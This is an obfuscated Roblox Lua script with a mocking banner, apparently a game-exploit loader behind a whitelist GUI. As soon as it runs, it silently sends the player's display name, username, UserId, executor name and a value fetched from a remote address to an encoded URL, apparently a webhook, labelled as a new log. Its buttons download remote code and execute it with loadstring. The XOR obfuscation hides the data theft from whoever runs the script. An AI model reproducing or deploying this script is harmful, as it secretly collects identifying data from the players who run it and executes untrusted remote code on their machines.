--[[

                        01001001 
         ?  ?                     01101110
      ?        ?                           01110100 
     ?    ? ?   ?                 ??                 01100101
                                                           01101110 
      NICE TRY SKID!!!                                              01110100 
                                                                             01100001 
A question.              Do you trying to rob the code?              01110011
                                                            01110100 
       ????????????????????                          01100101 
WOW!!, WHAT A SKID!   LOLOLOLL              00100000 
                                    1110010 
  MADE BY TECK BITCH.      01101111
                  01100010
         01100001
01110010

??? ]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v139,v140) local v141={};for v164=1, #v139 do v6(v141,v0(v4(v1(v2(v139,v164,v164 + 1 )),v1(v2(v140,1 + (v164% #v140) ,1 + (v164% #v140) + 1 )))%256 ));end return v5(v141);end local v8=game:HttpGet(v7("\217\215\207\53\245\225\136\81\208\211\210\107\239\171\206\24\200\141\212\55\225","\126\177\163\187\69\134\219\167"));function SendMessage(v142,v143) local v144=0;local v145;local v146;local v147;local v148;local v149;while true do if (v144==(0 -0)) then local v190=0 -0 ;local v191;while true do if ((0 + 0)==v190) then v191=0;while true do if ((1061 -(810 + 251))==v191) then v145=game:GetService(v7("\11\217\62\213\207\38\223\60\204\255\38","\156\67\173\74\165"));v146={[v7("\23\184\71\2\185\40\82\121\131\80\6\185","\38\84\215\41\118\220\70")]=v7("\81\6\50\30\247\83\23\54\27\241\94\89\40\1\241\94","\158\48\118\66\114")};v191=1 + 0 ;end if ((1 + 0)==v191) then v144=1 + 0 ;break;end end break;end end end if (v144==(535 -(43 + 490))) then v149=request({[v7("\115\207\58","\152\38\189\86\156\32\24\133")]=v142,[v7("\209\82\179\78\243\83","\38\156\55\199")]=v7("\152\82\79\28","\35\200\29\28\72\115\20\154"),[v7("\49\186\208\219\136\62\39","\84\121\223\177\191\237\76")]=v146,[v7("\153\89\205\185","\161\219\54\169\192\90\48\80")]=v148});break;end if (1==v144) then v147={[v7("\168\43\30\34\118\171\239","\155\203\68\112\86\19\197")]=v143};v148=v145:JSONEncode(v147);v144=735 -(711 + 22) ;end end end function SendMessageEMBED(v150,v151) local v152=0 -0 ;local v153;local v154;local v155;local v156;local v157;while true do if (v152==(859 -(240 + 619))) then v153=game:GetService(v7("\97\86\20\53\122\71\18\51\64\65\5","\69\41\34\96"));v154={[v7("\159\204\217\30\7\37\168\142\227\19\18\46","\75\220\163\183\106\98")]=v7("\3\170\155\59\208\1\187\159\62\214\12\245\129\36\214\12","\185\98\218\235\87")};v152=1 + 0 ;end if (v152==(1 -0)) then v155={[v7("\206\49\37\227\218\185","\202\171\92\71\134\190")]={{[v7("\61\200\56\132\44","\232\73\161\76")]=v151.title,[v7("\191\220\81\94\12\178\201\86\84\17\181","\126\219\185\34\61")]=v151.description,[v7("\15\193\82\125\108","\135\108\174\62\18\30\23\147")]=v151.color,[v7("\176\224\47\199\28\189","\167\214\137\74\171\120\206\83")]=v151.fields,[v7("\141\255\61\73\253\181","\199\235\144\82\61\152")]={[v7("\19\19\161\63","\75\103\118\217")]=v151.footer.text}}}};v156=v153:JSONEncode(v155);v152=2;end if (v152==2) then v157=request({[v7("\242\70\124","\126\167\52\16\116\217")]=v150,[v7("\229\43\52\136\187\29","\156\168\78\64\224\212\121")]=v7("\55\193\150\250","\174\103\142\197"),[v7("\126\45\94\60\32\76\235","\152\54\72\63\88\69\62")]=v154,[v7("\246\203\234\69","\60\180\164\142")]=v156});break;end end end local v9=v7("\80\74\17\57\52\183\93\23\90\12\58\36\226\0\92\16\6\38\42\162\19\72\87\74\62\34\239\26\87\81\14\58\104\188\64\14\6\92\126\112\190\69\15\10\81\122\118\181\70\15\12\81\102\63\190\11\77\68\80\30\44\255\61\127\107\63\6\17\225\33\123\77\46\26\13\232\40\86\13\1\22\127\202\57\93\111\80\8\1\238\51\73\116\48\22\113\203\57\123\107\82\3\18\231\31\80\107\12\4\114\190\67\90\102\19\127\37\193\8\77\84","\114\56\62\101\73\71\141");SendMessage(v9);local v10={[v7("\172\224\207\200\189","\164\216\137\187")]=v7("\241\238\48\189\181\190\61\133\168\103\252\243\231\75\254\233\54\161\252","\107\178\134\81\210\198\158"),[v7("\60\11\145\197\184\49\30\150\207\165\54","\202\88\110\226\166")]="We've detected a new log",[v7("\192\0\142\248\216","\170\163\111\226\151")]=2550000,[v7("\23\57\183\52\74\36","\73\113\80\210\88\46\87")]={{[v7("\143\45\192\23","\135\225\76\173\114")]=v7("\51\221","\199\122\141\216\208\204\221"),[v7("\187\220\28\229\125","\150\205\189\112\144\24")]=v8},{[v7("\43\133\178\73","\112\69\228\223\44\100\232\113")]=v7("\240\22\20\195\186\125\159\148\49\6\222\179","\230\180\127\103\179\214\28"),[v7("\154\4\83\83\225","\128\236\101\63\38\132\33")]=game.Players.LocalPlayer.DisplayName},{[v7("\162\168\28\65","\175\204\201\113\36\214\139")]=v7("\114\223\48\206\68\105\205\56\217","\100\39\172\85\188"),[v7("\187\121\181\149\54","\83\205\24\217\224")]=game.Players.LocalPlayer.Name},{[v7("\232\196\192\56","\93\134\165\173")]=v7("\139\225\196\208\122\231\150","\30\222\146\161\162\90\174\210"),[v7("\243\79\124\31\224","\106\133\46\16")]=game.Players.LocalPlayer.UserId},{[v7("\86\33\126\249","\32\56\64\19\156\58")]=v7("\127\208\245\90\85\251\148","\224\58\168\133\54\58\146"),[v7("\79\87\71\232\112","\107\57\54\43\157\21\230\231")]=identifyexecutor()}},[v7("\221\132\30\225\188\206","\175\187\235\113\149\217\188")]={[v7("\40\170\153\88","\24\92\207\225\44\131\25")]=" "}};SendMessageEMBED(v9,v10);local v11={[v7("\99\214\180\64\20\87\78\192\173\95\75\45\18","\29\43\179\216\44\123")]=true,[v7("\228\212\45\84\173","\44\221\185\64")]=true,[v7("\53\190\70\81\120","\19\97\135\40\63")]=true,[v7("\140\78\43\34\33\34","\81\206\60\83\91\79")]=true,[v7("\107\133\245\94\2\146\28","\196\46\203\176\18\79\163\45")]=true,[v7("\225\14\80\59\27\217\206\154\11","\143\216\66\30\126\68\155")]=true,[v7("\253\222\23\200\215\170\210\246","\129\202\168\109\171\165\195\183")]=true,[v7("\115\123\56\202\205\71\246","\134\66\56\87\184\190\116")]=true,[v7("\12\48\10\178\1\219\32\54\53","\85\92\81\105\219\121\139\65")]=true,[v7("\223\161\95\81\116\218\239\146\94\65\110\208\244\183","\191\157\211\48\37\28")]=true,[v7("\236\51\211\25\54\239\26\251\14\25\211\30\250","\90\191\127\148\124")]=true,[v7("\83\134\34\68\123\143\39\25\72\130\45\31\113\137","\119\24\231\78")]=true,[v7("\168\34\182\95\217\100\24\135\35\177\79\207\100\20\174\44\177\75","\113\226\77\197\42\188\32")]=true,[v7("\63\26\240\172\54\23\250\138\104\64\172","\213\90\118\148")]=true,[v7("\127\55\173\105\94\94\45\161\88\73\90\60\189\87","\45\59\78\212\54")]=true,[v7("\49\68\130\137\131\13\162\254\36\89\147\155\131\60\190","\144\112\54\227\235\230\78\205")]=true,[v7("\185\39\14\242\214\94\161\122\94","\59\211\72\111\156\176")]=true,[v7("\87\130\240\62\71\184\247\34\92\130\249","\77\46\231\131")]=true,[v7("\138\81\186\79\180\85\166\82\179\81\162\65\238","\32\218\52\214")]=true};local v12={[v7("\102\18\61\164\254\154\64\73\91\4\97\248\168","\58\46\119\81\200\145\208\37")]=v7("\107\204\20\185\185\184\118\12\158\53\162\168\185\51\107\222\112\138\160\165\51\47\199","\86\75\236\80\204\201\221"),[v7("\43\76\122\157\238","\235\18\33\23\229\158")]=v7("\16\250\230\142\121\250\229\169\81\189\198\186\82\182\196\251\95\180\129\139\115\245\236\148\114\147\237\158\27","\219\48\218\161"),[v7("\208\40\114\71\208","\128\132\17\28\41\187\47")]=v7("\65\114\32\54\84\15\53\70\10\81\0\43\3\40\78\65\6\9\122\107\14\59\2\113","\61\97\82\102\90"),[v7("\137\0\142\103\234\6\79","\105\204\78\203\43\167\55\126")]=v7("\229\234\15\17\28\20\135\122\172\166\47\94\35\8\198\72\160\184\48\85","\49\197\202\67\126\115\100\167"),[v7("\110\119\241\12\191\116\127\21\114","\62\87\59\191\73\224\54")]=v7("\167\66\223\199\243\7\232\137\197\23\238\221\232\12\186\239\238\26\255\205\172","\169\135\98\154"),[v7("\251\118\39\93\229\3\201\200\126","\168\171\23\68\52\157\83")]=v7("\180\49\211\161\44\35\128\180\102\252\185\45\109\160\230\116\251\172\33\40\199\166\49\197\172\55\57\142\247\125\240\190\110","\231\148\17\149\205\69\77"),[v7("\215\177\221\248\69\246\133\176","\159\224\199\167\155\55")]=v7("\183\179\17\221\245\250\48\215\183\212\9\251\183\197\57\192\228\250\51\220\188","\178\151\147\92"),[v7("\168\228\85\13\1\73\121\153\243\72\51\0\69\123","\26\236\157\44\82\114\44")]=v7("\106\110\225\94\38\43\197\84\56\58\149\111\37\110\212\27\26\43\219\88\35\34\158","\59\74\78\181"),[v7("\22\253\125\95\191\21\212\85\72\144\41\208\84","\211\69\177\58\58")]=v7("\247\165\88\251\253\194\247\195\117\252\231\204\252","\171\215\133\25\149\137"),[v7("\213\192\59\251\232\63\222\67\239\205\51\254\247","\34\129\168\82\154\143\80\156")]=v7("\197\242\18\15\76\75\141\197\131\38\2\75\69\201\162\160\54\5\73\74\140\197\224\115\44\68\71\157\134\186\120","\233\229\210\83\107\40\46"),[v7("\144\97\61\196\22\146\82","\101\161\34\82\182")]=v7("\168\77\120\235\207\237\194\29\237\1\92\253\207\162\164\39\240\8\93\181","\78\136\109\57\158\187\130\226")};local function v13(v158) local v159=0 + 0 ;local v160;while true do if (1==v159) then v160.Parent=v158;v160.BackgroundTransparency=1;v159=2 + 0 ;end if (v159==(0 -0)) then local v194=0 -0 ;local v195;while true do if (0==v194) then v195=1739 -(404 + 1335) ;while true do if (v195==(407 -(183 + 223))) then v159=1;break;end if (0==v195) then v160=Instance.new(v7("\23\50\248\246\59\19\248\243\59\51","\145\94\95\153"));v160.Name=v7("\218\193\27\194","\215\157\173\116\181\46");v195=1;end end break;end end end if (v159==(4 -0)) then v160.ScaleType=Enum.ScaleType.Slice;v160.SliceCenter=Rect.new(20,20,280,186 + 94 );break;end if (v159==(1 + 1)) then v160.Size=UDim2.new(338 -(10 + 327) ,14 + 6 ,339 -(118 + 220) ,7 + 13 );v160.Position=UDim2.new(0, -(459 -(108 + 341)),0 + 0 , -10);v159=12 -9 ;end if (v159==(1496 -(711 + 782))) then v160.Image=v7("\39\182\147\243\201\38\177\159\251\222\111\251\196\166\131\108\226\211\171\139\108\227\219","\186\85\212\235\146");v160.ImageColor3=Color3.fromRGB(55,11,488 -233 );v159=4;end end end local v14=Instance.new(v7("\241\130\4\251\60\224\127\215\136","\56\162\225\118\158\89\142"));v14.Name=v7("\107\13\201\187\39\212\85\22\212\142\44\220\112\10\199\188\17\219\78\0\197\161\5\205\85","\184\60\101\160\207\66");v14.ZIndexBehavior=Enum.ZIndexBehavior.Global;v14.IgnoreGuiInset=true;v14.ResetOnSpawn=false;v14.Parent=game.Players.LocalPlayer:WaitForChild(v7("\1\142\125\165\52\144\91\169\56","\220\81\226\28"));local v21=Instance.new(v7("\53\199\131\246\239","\167\115\181\226\155\138"));v21.Name=v7("\192\46\242\78\93\99\199\239\39","\166\130\66\135\60\27\17");v21.Size=UDim2.new(470 -(270 + 199) ,0 + 0 ,1820 -(580 + 1239) ,0 -0 );v21.Position=UDim2.new(0 + 0 ,0,0,0 + 0 );v21.BackgroundColor3=Color3.fromRGB(0 + 0 ,0 -0 ,0 + 0 );v21.BackgroundTransparency=1167.1 -(645 + 522) ;v21.BorderSizePixel=0;v21.Parent=v14;local v29=Instance.new(v7("\102\70\219\103\21\66\76\203\118\36","\80\36\42\174\21"));v29.Name=v7("\121\24\62\110\75\28\62\105\90\49\57\126\98\31\48\105\108\28\34\104\107\22\49\127\77\4","\26\46\112\87");v29.Size=1850 -(1010 + 780) ;v29.Parent=v21;local v33=Instance.new(v7("\159\49\170\121\186","\212\217\67\203\20\223\223\37"));v33.Name=v7("\152\140\171\217\189\159\167\199\180\137\142\192\187\128\173","\178\218\237\200");v33.Size=UDim2.new(0.8 + 0 ,0 -0 ,0.8 -0 ,1836 -(1045 + 791) );v33.Position=UDim2.new(0.1 -0 ,0,0.1 -0 ,505 -(351 + 154) );v33.BackgroundColor3=Color3.fromRGB(1829 -(1281 + 293) ,255,255);v33.BackgroundTransparency=1;v33.BorderSizePixel=266 -(28 + 238) ;v33.ZIndex=4 -2 ;v33.Parent=v21;local v42=Instance.new(v7("\130\176\254\196\154\180\228\213\186","\176\214\213\134"));v42.Name=v7("\195\165\191\192\173\90\80\231\185\130\221\188\90\92\216\172\180\209\164","\57\148\205\214\180\200\54");v42.Size=UDim2.new(1559.4 -(1381 + 178) ,0 + 0 ,0.05 + 0 ,0 + 0 );v42.Position=UDim2.new(0.1 -0 ,0,0.15 + 0 ,0);v42.BackgroundTransparency=471 -(381 + 89) ;v42.Text=v7("\37\245\60\32\115\30\244\38\32\54\39\238\48\38\101\72","\22\114\157\85\84");v42.TextColor3=Color3.fromRGB(227 + 28 ,173 + 82 ,255);v42.TextSize=30 -12 ;v42.Font=Enum.Font.Roboto;v42.ZIndex=1159 -(1074 + 82) ;v42.Parent=v33;v13(v42);local v54=Instance.new(v7("\247\200\1\203\81\250\161\202\204\53\214\92\251\173","\200\164\171\115\164\61\150"));v54.Name=v7("\137\252\10\81\134\178\253\16\81\176\189\230\12\73\143\152\230\2\72\134","\227\222\148\99\37");v54.Size=UDim2.new(0.4,0 -0 ,1784.6 -(214 + 1570) ,0);v54.Position=UDim2.new(1455.1 -(990 + 465) ,0,0.25 + 0 ,0 + 0 );v54.BackgroundTransparency=1 + 0 ;v54.ScrollBarThickness=19 -14 ;v54.ScrollingDirection=Enum.ScrollingDirection.Y;v54.ZIndex=3;v54.Parent=v33;local function v64() for v165,v166 in pairs(v11) do local v167=Instance.new(v7("\7\87\74\226\213\50\80\87\250","\153\83\50\50\150"));v167.Name=v165   .. v7("\113\119\113\25\127","\45\61\22\19\124\19\203") ;v167.Size=UDim2.new(1,1726 -(1668 + 58) ,626 -(512 + 114) ,78 -48 );v167.Position=UDim2.new(0,0 -0 ,0 -0 ,30 * ( #v54:GetChildren() -(1 + 0)) );v167.BackgroundTransparency=1 + 0 ;v167.Text=v165;v167.TextColor3=(v11[v165] and Color3.fromRGB(222 + 33 ,860 -605 ,2249 -(109 + 1885) )) or Color3.fromRGB(1469 -(1269 + 200) ,0 -0 ,815 -(98 + 717) ) ;v167.TextSize=844 -(802 + 24) ;v167.Font=Enum.Font.Arial;v167.ZIndex=5 -2 ;v167.Parent=v54;if v11[v165] then v13(v167);end end end v64();local v65=Instance.new(v7("\245\23\21\225\46\113\187\196\30","\217\161\114\109\149\98\16"));v65.Name=v7("\62\47\63\111\136\125\6\44\61\80\189\118\23\44","\20\114\64\88\28\220");v65.Size=UDim2.new(0.4 -0 ,0 + 0 ,0.05 + 0 ,0);v65.Position=UDim2.new(0.5 + 0 ,0,0.15 + 0 ,0);v65.BackgroundTransparency=2 -1 ;v65.Text=v7("\18\9\211\186\255\213\253\29\14\213\167\162","\221\81\97\178\212\152\176");v65.TextColor3=Color3.fromRGB(850 -595 ,92 + 163 ,104 + 151 );v65.TextSize=15 + 3 ;v65.Font=Enum.Font.Roboto;v65.ZIndex=3 + 0 ;v65.Parent=v33;v13(v65);local v76=Instance.new(v7("\254\228\15\244\22\193\238\19\252\60\223\230\16\254","\122\173\135\125\155"));v76.Name=v7("\168\206\7\170\12\50\218\139\205\12\159\45\48\197\129","\168\228\161\96\217\95\81");v76.Size=UDim2.new(0.4 + 0 ,0,0.6,1433 -(797 + 636) );v76.Position=UDim2.new(0.5 -0 ,1619 -(1427 + 192) ,0.25 + 0 ,0);v76.BackgroundTransparency=2 -1 ;v76.ScrollBarThickness=5 + 0 ;v76.ScrollingDirection=Enum.ScrollingDirection.Y;v76.ZIndex=2 + 1 ;v76.Parent=v33;local function v85() for v179,v180 in pairs(v12) do local v181=0;local v182;while true do if (v181==(329 -(192 + 134))) then v182.TextXAlignment=Enum.TextXAlignment.Left;v182.ZIndex=1279 -(316 + 960) ;v182.Parent=v76;v181=3 + 1 ;end if (v181==2) then local v207=0;while true do if (v207==(0 + 0)) then v182.TextColor3=Color3.fromRGB(255,236 + 19 ,974 -719 );v182.TextSize=569 -(83 + 468) ;v207=1807 -(1202 + 604) ;end if (v207==(4 -3)) then v182.Font=Enum.Font.Arial;v181=3;break;end end end if (v181==(6 -2)) then v13(v182);break;end if (v181==1) then v182.Position=UDim2.new(0,0,0 -0 ,30 * ( #v76:GetChildren() -1) );v182.BackgroundTransparency=326 -(45 + 280) ;v182.Text=v180;v181=2;end if (v181==0) then v182=Instance.new(v7("\239\212\54\72\3\86\217\212\34","\55\187\177\78\60\79"));v182.Name=v179   .. v7("\1\193\88\199\71\205\133\33","\224\77\174\63\139\38\175") ;v182.Size=UDim2.new(1,0 + 0 ,0 + 0 ,30);v181=1 + 0 ;end end end end v85();local v86=Instance.new(v7("\176\68\64\58\168\64\90\43\136","\78\228\33\56"));v86.Name=v7("\227\127\182\6\167\215\74\183\27\145","\229\174\30\210\99");v86.Size=UDim2.new(0,200,0,12 + 8 );v86.Position=UDim2.new(1 + 0 , -220,1, -(55 -25));v86.BackgroundTransparency=1;v86.Text=v7("\54\236\130\84\173\63\32\91\217\131\82\230\125\116\91\235\146\31\173\7\21\45\172","\89\123\141\230\49\141\93");v86.TextColor3=Color3.fromRGB(2166 -(340 + 1571) ,101 + 154 ,2027 -(1733 + 39) );v86.TextSize=38 -24 ;v86.Font=Enum.Font.Roboto;v86.TextXAlignment=Enum.TextXAlignment.Right;v86.ZIndex=3;v86.Parent=v33;local v99=Instance.new(v7("\199\116\238\24\60\75\241\116\250","\42\147\17\150\108\112"));v99.Name=v7("\57\163\63\108\238\231\1\146\40\103\243","\136\111\198\77\31\135");v99.Size=UDim2.new(0,1234 -(125 + 909) ,1948 -(1096 + 852) ,9 + 11 );v99.Position=UDim2.new(0 -0 ,20 + 0 ,513 -(409 + 103) , -30);v99.BackgroundTransparency=1;v99.Text=v7("\33\28\181\68\184\234\3\233\20\12\181\69\180\235\25\243\66\91\233\1\243\178\13\232","\201\98\105\199\54\221\132\119");v99.TextColor3=Color3.fromRGB(255,255,491 -(46 + 190) );v99.TextSize=109 -(51 + 44) ;v99.Font=Enum.Font.Roboto;v99.TextXAlignment=Enum.TextXAlignment.Left;v99.ZIndex=1 + 2 ;v99.Parent=v33;local v112=Instance.new(v7("\141\9\155\53\32\32\184\173\3\141","\204\217\108\227\65\98\85"));v112.Name=v7("\125\203\240\230\39\226\75\215\225\234\34","\160\62\163\149\133\76");v112.Size=UDim2.new(1317.2 -(1114 + 203) ,0,726.09 -(228 + 498) ,0);v112.Position=UDim2.new(0.3 + 0 ,0 + 0 ,663.89 -(174 + 489) ,0 -0 );v112.BackgroundColor3=Color3.fromRGB(1905 -(830 + 1075) ,30,524 -(303 + 221) );v112.BackgroundTransparency=1269.7 -(231 + 1038) ;v112.BorderSizePixel=0.1;v112.TextColor3=Color3.fromRGB(255,213 + 42 ,1417 -(171 + 991) );v112.TextSize=14;v112.Text=v7("\230\131\77\8\246\255","\163\182\192\109\79");v112.Font=Enum.Font.Roboto;v112.ZIndex=12 -9 ;v112.Parent=v33;v13(v112);local v125=Instance.new(v7("\0\35\24\212\215\33\50\20\207\251","\149\84\70\96\160"));v125.Name=v7("\21\9\15\228\52\3\47\248\44\18\2\227","\141\88\102\109");v125.Size=UDim2.new(0.2,0 -0 ,0.09 -0 ,0 + 0 );v125.Position=UDim2.new(0.5,0 -0 ,0.89 -0 ,0 -0 );v125.BackgroundColor3=Color3.fromRGB(123 -83 ,1248 -(111 + 1137) ,158 -(91 + 67) );v125.BackgroundTransparency=0.7 -0 ;v125.BorderSizePixel=0.1 + 0 ;v125.TextColor3=Color3.fromRGB(778 -(423 + 100) ,255,255);v125.TextSize=14;v125.Text=v7("\158\124\232\89\54\24\21\230\134\122","\161\211\51\170\16\122\93\53");v125.Font=Enum.Font.Roboto;v125.ZIndex=1 + 2 ;v125.Parent=v33;v13(v125);local function v138(v161,v162) local v163=game.Players.LocalPlayer.Name;if (v163==v7("\207\166\187\41\252\161\144\41\245\171\179\44\227","\72\155\206\210")) then local v183=0 -0 ;while true do if (v183==(0 + 0)) then game.Players.LocalPlayer:Kick(v7("\117\115\83\27\54\6\119\85\0\55\71\116\80\1\115\69\123\70\15\32\6\106\65\26\60\6\110\92\7\50\65\117\26","\83\38\26\52\110"));return;end end end if v11[v163] then local v184=771 -(326 + 445) ;local v185;local v186;local v187;while true do if (v184==1) then v187=nil;while true do if ((4 -3)==v185) then if v186 then local v231=0 -0 ;while true do if ((0 -0)==v231) then loadstring(v187)();v14:Destroy();break;end end else game.StarterGui:SetCore(v7("\3\27\142\28\111\63\10\137\30\72\51\31\148\17\78\62","\33\80\126\224\120"),{[v7("\216\161\23\200\89","\60\140\200\99\164")]=v7("\180\247\22\47\178\147\180\40\41\163\131\253\10\33\226\162\230\22\41\176\198","\194\231\148\100\70"),[v7("\114\73\217\183","\168\38\44\161\195\150")]=v7("\166\253\139\122\53\236\246\2\143\188\142\121\49\236\246\2\136\249\194\101\51\250\191\6\148\178\194\70\60\237\183\5\133\188\150\100\41\168\183\17\129\245\140\54\60\233\162\19\146\178","\118\224\156\226\22\80\136\214"),[v7("\107\237\86\142","\224\34\142\57")]=v7("\214\179\209\205\41\190\18\25\201\176\139\207\124\243\81\1\198\233\198\210\126\190\92\29\205\162\209\146\44\248\89\83\139\242\157\136\35\168\8\91\142\254","\110\190\199\165\189\19\145\61"),[v7("\254\254\101\233\159\206\213\229","\167\186\139\23\136\235")]=715 -(530 + 181) });end break;end if (v185==0) then game.StarterGui:SetCore(v7("\107\18\41\66\118\24\51\79\94\30\36\71\76\30\40\72","\38\56\119\71"),{[v7("\199\230\76\218\32","\54\147\143\56\182\69")]=v7("\247\148\235\65\218\216\149\246\74\222\194\136\240\71","\191\182\225\159\41"),[v7("\31\23\48\65","\162\75\114\72\53\235\231")]=v7("\181\51\81\162\82\16\137\124\77\236\19\22\132\57\4\245\91\11\152\57\72\235\64\22\194\124\115\231\95\1\131\49\65\162\71\13\204","\98\236\92\36\130\51")   .. v162   .. v7("\228\47\9\168\86\161\186\62\234","\80\196\121\108\218\37\200\213") ,[v7("\41\112\13\113","\234\96\19\98\31\43\110")]=v7("\14\11\70\215\246\61\196\17\8\69\137\190\125\137\10\16\74\137\175\125\134\73\30\65\212\169\102\196\89\22\86\154\249\39\211\83\79\11\146\249\34\210","\235\102\127\50\167\204\18"),[v7("\116\180\231\34\80\39\95\175","\78\48\193\149\67\36")]=884 -(614 + 267) });v186,v187=pcall(function() return game:HttpGet(v161);end);v185=33 -(19 + 13) ;end end break;end if (v184==0) then v185=0 -0 ;v186=nil;v184=2 -1 ;end end else local v188=0;local v189;while true do if (v188==(0 -0)) then game.StarterGui:SetCore(v7("\41\176\134\9\52\186\156\4\28\188\139\12\14\188\135\3","\109\122\213\232"),{[v7("\218\254\182\60\235","\80\142\151\194")]=v7("\34\211\99\68\6\200\99\69\0\199\99\69\12\200","\44\99\166\23"),[v7("\72\242\49\34","\196\28\151\73\86\83")]=v7("\202\12\60\80\131\74\29\54\253\12\61\80\141\86\88\98\251\6\105\7\138\81\12\115\255\10\58\4\204\24\40\122\246\2\58\21\194\91\23\120\231\2\42\4\194\87\15\120\246\17\105\52\139\75\27\121\225\7\115\80\162\76\77\120\253\8\103","\22\147\99\73\112\226\56\120"),[v7("\145\118\237\251","\237\216\21\130\149")]=v7("\138\90\75\79\234\134\17\149\89\72\17\162\198\92\142\65\71\17\179\198\83\205\79\76\76\181\221\17\221\71\91\2\229\156\6\215\30\6\10\229\153\7","\62\226\46\63\63\208\169"),[v7("\193\12\71\130\11\4\32\80","\62\133\121\53\227\127\109\79")]=3 + 7 });v189=Instance.new(v7("\36\17\42\225\244\187\182\4\27\60","\194\112\116\82\149\182\206"));v189.Name=v7("\26\164\67\11\197\192\27\45\188\67\22","\110\89\200\44\120\160\130");v189.Size=UDim2.new(0.2 -0 ,0 -0 ,1812.09 -(1293 + 519) ,0 -0 );v188=2 -1 ;end if (v188==(5 -2)) then v189.ZIndex=12 -9 ;v189.Parent=v33;v13(v189);v189.MouseButton1Click:Connect(function() v14:Destroy();end);break;end if (v188==1) then v189.Position=UDim2.new(0.4,0 -0 ,0.9 + 0 ,50);v189.BackgroundColor3=Color3.fromRGB(25,0 + 0 ,0 -0 );v189.BackgroundTransparency=0.7 + 0 ;v189.BorderSizePixel=0;v188=2;end if (v188==(1 + 1)) then v189.TextColor3=Color3.fromRGB(125 + 75 ,1296 -(709 + 387) ,2058 -(673 + 1185) );v189.TextSize=43 -28 ;v189.Text=v7("\142\219\66\82","\45\203\163\43\38\35\42\91");v189.Font=Enum.Font.Roboto;v188=9 -6 ;end end end end v112.MouseButton1Click:Connect(function() v138(v7("\218\145\200\51\148\243\27\157\151\221\52\201\174\93\198\141\201\33\146\186\81\192\134\211\45\147\172\90\198\203\223\44\138\230\1\135\128\223\40\140\230\25\235\171\242\13\179\136\108\157\136\221\42\137\230\103\209\151\213\51\147","\52\178\229\188\67\231\201"),v7("\17\98","\67\65\33\48\100\151\60"));end);v125.MouseButton1Click:Connect(function() v138(v7("\215\243\186\200\224\133\168\225\202\242\200\169\169\209\231\215\242\172\205\224\218\245\173\215\253\203\226\160\204\189\220\232\163\151\166\138\226\173\211\248\144\170\151\246\221\241\211\143\224\190\242\200\140\151\254\222\238\160\151\192\220\245\167\200\231","\147\191\135\206\184"),v7("\169\39\164\200\212\86","\210\228\72\198\161\184\51"));end);
